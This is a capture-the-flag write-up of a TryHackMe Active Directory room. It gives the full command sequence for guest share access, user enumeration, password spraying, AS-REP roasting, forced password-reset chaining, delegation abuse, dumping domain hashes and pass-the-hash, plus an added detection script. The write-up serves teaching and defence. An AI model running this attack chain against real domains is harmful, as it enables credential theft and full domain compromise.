Reset Writeup

theblxckcicada

Credit for this room goes to h4sh3m00 and TryHackMe.

In this room, we'll step into the shoes of a red teamer in a simulated hack challenge. We'll navigate a realistic organizational environment with up-to-date defenses, where we'll test our penetration testing skills, try to bypass security measures, and infiltrate the system.

From our nmap scan, run through the nmapAutomator wrapper, we can see that the target is a Windows server running Active Directory. Below is the part of the nmap output that matters most for us.

sudo nmapAutomator.sh -t Full -H 10.10.149.103

PORT      STATE SERVICE       VERSION
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-19 07:41:43Z)
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM
|   NetBIOS_Domain_Name: THM
|   NetBIOS_Computer_Name: HAYSTACK
|   DNS_Domain_Name: thm.corp
|   DNS_Computer_Name: HayStack.thm.corp
|   DNS_Tree_Name: thm.corp
|   Product_Version: 10.0.17763
|_  System_Time: 2025-07-19T07:42:35+00:00
| ssl-cert: Subject: commonName=HayStack.thm.corp
| Not valid before: 2025-07-18T07:32:24
|_Not valid after:  2026-01-17T07:32:24
|_ssl-date: 2025-07-19T07:43:15+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: HAYSTACK; OS: Windows; CPE: cpe:/o:microsoft:windows

From the nmap scan we can see that the domain for this server is thm.corp and the DNS computer name is haystack.thm.corp. We add both of these names to /etc/hosts.

10.10.149.103       thm.corp haystack.thm.corp

Using crackmapexec we are able to list the shares as the guest user, since that account is not disabled and does not require a password. The results show that we can both read and write to the Data share.

crackmapexec smb thm.corp -u 'guest' -p '' --shares

To access the share we use smbclient and authenticate as the guest user with no password. In the share we find a directory named onboarding containing 3 files, and we use the smbclient commands below to download all of them.

smbclient //thm.corp/Data -U guest

# Download the files from the smbclient shell
prompt off # disables the confirmation prompt for each file when downloading
recurse on # also downloads the contents of subdirectories, if any exist
mget * # downloads everything in the current directory
exit # leaves the smbclient shell session

Now that we have downloaded all the files to our local machine, we can see that the text file contains an email template. It appears to be intended for a new team member and includes a default password: ResetMe123!.

cat 4fx32pug.h2y.txt

We now have a password but no user account, so it is time to find a user. Since we noticed that the guest account is active, we use impacket's lookupsid to enumerate the local and domain usernames on the server by brute-forcing RIDs.

impacket-lookupsid thm.corp/guest@thm.corp -no-pass | awk -F '[:\\(\\)]' '/SidTypeUser/ {print $3}'

We save the list of users to the users.txt file for safekeeping, as we may need it later. To find out whether any user never updated their password and still uses the default one, we can use kerbrute or crackmapexec. In this case I used crackmapexec and found one valid user, LILY_ONEILL.

crackmapexec smb thm.corp -u users.txt -p 'ResetMe123!'

Even though we found valid user credentials, we couldn't use them because they were revoked, so we need another attack path. Just as we used impacket-lookupsid, we now use impacket-GetNPUsers, which requests AS-REP responses for a given list of users and collects them for any account that has Kerberos pre-authentication disabled. This technique is known as ASREPRoasting. From the hashes we obtained, we cracked the password for TABATHA_BRITT using hashcat, as shown below.

impacket-GetNPUsers 'thm.corp/guest'@thm.corp -no-pass -request -usersfile users.txt

hashcat hash.txt /opt/wordlists/rockyou.txt

Now that we have a valid username and password, we need more insight into the domain, and for that we use BloodHound to gather information about our target.

bloodhound-python -d thm.corp -u tabatha_britt -p 'marlboro(1985)' -ns 10.10.149.103  -c all

To launch the BloodHound web interface, use the following commands. When you run sudo docker-compose -f bloodhound.yml up, the startup output prints a default password. Log in with the username admin and that password, then reset it.

sudo apt update && sudo apt upgrade
sudo apt install docker.io
sudo systemctl enable docker --now
sudo apt install docker-compose
curl -L https://ghst.ly/getbhce -o bloodhound.yml
sudo docker-compose -f bloodhound.yml up

After logging into the interface, upload all the files collected by bloodhound-python and go to Explore. Instead of searching, click on PATHFINDING. From SEARCHING, we already know that CECILE_WONG is a member of Domain Admins, so we need to find a path to her account.

The resulting path shows that TABATHA_BRITT can force a password change for SHAWNA_BRAY, who can do the same for CRUZ_HALL. CRUZ_HALL can in turn force a password change for DARLA_WINTERS, who holds delegation rights on the server. We use the following commands to change the passwords of these users in order.

net rpc password "SHAWNA_BRAY" "P@ssw0rd123" -U "thm.corp"/"TABATHA_BRITT"%"marlboro(1985)" -S "10.10.149.103"
net rpc password "CRUZ_HALL" "P@ssw0rd123" -U "thm.corp"/"SHAWNA_BRAY"%"P@ssw0rd123" -S "10.10.149.103"
net rpc password "DARLA_WINTERS" "P@ssw0rd123" -U "thm.corp"/"CRUZ_HALL"%"P@ssw0rd123" -S "10.10.149.103"
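As an added defensive example (not part of the original writeup and not tooling from the room), the Python below runs over constructed Windows Security events and flags the two signals the steps above leave on a domain controller: AS-REP roasting (Event ID 4768 with Pre-Authentication Type 0 and an RC4 ticket, which is what the GetNPUsers step produces) and the chain of forced password resets (Event ID 4724) used to reach DARLA_WINTERS. The event records, timestamps, IP addresses and the HELPDESK1 account are constructed sample data.

```python
from datetime import datetime, timedelta

# Constructed sample Windows Security events (not real logs). Field names follow
# the Security log XML: 4768 = Kerberos TGT requested, 4724 = password reset attempt.
EVENTS = [
    {"id": 4768, "t": "2025-07-19T07:50:01", "TargetUserName": "TABATHA_BRITT",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "IpAddress": "10.50.1.7"},
    {"id": 4768, "t": "2025-07-19T07:50:02", "TargetUserName": "LILY_ONEILL",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "IpAddress": "10.50.1.8"},
    {"id": 4724, "t": "2025-07-19T08:01:00",
     "SubjectUserName": "TABATHA_BRITT", "TargetUserName": "SHAWNA_BRAY"},
    {"id": 4724, "t": "2025-07-19T08:01:30",
     "SubjectUserName": "SHAWNA_BRAY", "TargetUserName": "CRUZ_HALL"},
    {"id": 4724, "t": "2025-07-19T08:02:00",
     "SubjectUserName": "CRUZ_HALL", "TargetUserName": "DARLA_WINTERS"},
    {"id": 4724, "t": "2025-07-19T15:00:00",  # routine helpdesk reset, not a chain
     "SubjectUserName": "HELPDESK1", "TargetUserName": "LILY_ONEILL"},
]


def asrep_roast_candidates(events):
    """Return (account, source IP) for 4768 events with Pre-Authentication Type 0
    (logon without pre-authentication) and an RC4-HMAC (0x17) ticket: the shape a
    GetNPUsers request leaves behind, and the ticket type that is cracked offline.
    Accounts listed here should have Kerberos pre-authentication re-enabled."""
    return [(e["TargetUserName"], e["IpAddress"]) for e in events
            if e["id"] == 4768 and e["PreAuthType"] == "0"
            and e["TicketEncryptionType"] == "0x17"]


def reset_chains(events, window=timedelta(minutes=30), min_resets=2):
    """Link 4724 events where the subject performing a reset was itself the target
    of a reset less than `window` earlier. Several hops within minutes is the
    footprint of ForceChangePassword abuse; a single reset is normal helpdesk work.
    Returns each chain as the ordered list of accounts it passed through."""
    resets = sorted((e for e in events if e["id"] == 4724), key=lambda e: e["t"])
    chains = []  # each entry: [time of last hop, [account, account, ...]]
    for e in resets:
        t = datetime.fromisoformat(e["t"])
        extended = False
        for chain in chains:
            if chain[1][-1] == e["SubjectUserName"] and t - chain[0] <= window:
                chain[1].append(e["TargetUserName"])
                chain[0] = t
                extended = True
        if not extended:
            chains.append([t, [e["SubjectUserName"], e["TargetUserName"]]])
    return [accounts for _, accounts in chains if len(accounts) - 1 >= min_resets]
```

Against the sample data, the first function flags only TABATHA_BRITT and the second returns the four-account reset chain while ignoring the lone helpdesk reset.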

Now that we have valid credentials for DARLA_WINTERS, we use impacket-findDelegation to list the account's delegation rights.

impacket-findDelegation thm.corp/'DARLA_WINTERS':P@ssw0rd123  -dc-ip 10.10.149.103

From the list we choose the cifs/HayStack.thm.corp service, request a service ticket on behalf of the administrator by impersonating that account, and then point the KRB5CCNAME environment variable at the saved ticket.

# Request a ticket on behalf of the administrator
impacket-getST thm.corp/'DARLA_WINTERS':'P@ssw0rd123' -spn cifs/HAYSTACK.thm.corp -impersonate administrator -dc-ip 10.10.149.103

# Save to environment variable
export KRB5CCNAME=administrator@cifs_HAYSTACK.thm.corp@THM.CORP.ccache

Now that we have the ticket, we can pass it to the domain controller and dump the NTLM hashes for all domain users.

impacket-secretsdump thm.corp/administrator@HAYSTACK.thm.corp -k -no-pass -dc-ip 10.10.149.103 -just-dc-ntlm

The final step is to use evil-winrm to get a shell session with the NTLM hash of CECILE_WONG, who is a member of Domain Admins.

evil-winrm -u CECILE_WONG -H 067a84e5afaed843ed4a8fdac5facac3 -i thm.corp

As you followed along, you may have noticed that I didn't show any flags, and that was intentional. This write-up is meant to help you understand and develop the mindset of a penetration tester. We are not hunting for flags; instead, we are simulating real-world attacks. Keep practicing, stay curious, and let each challenge sharpen your approach to real-world security testing.
